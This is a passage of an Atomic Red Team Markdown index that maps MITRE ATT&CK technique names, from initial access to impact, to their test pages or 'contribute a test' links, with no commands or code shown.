| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Startup Items](../../T1037.005/T1037.005.md) | [Windows Service](../../T1543.003/T1543.003.md) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | [Systemd Service](../../T1543.002/T1543.002.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | [Systemd Timers](../../T1053.006/T1053.006.md) | | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
| | | [Trap](../../T1546.005/T1546.005.md) | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | | | | | | | |
| | | [Windows Service](../../T1543.003/T1543.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
| | | | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Unix Shell](../../T1059.004/T1059.004.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Remote Access Software](../../T1219/T1219.md) | |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
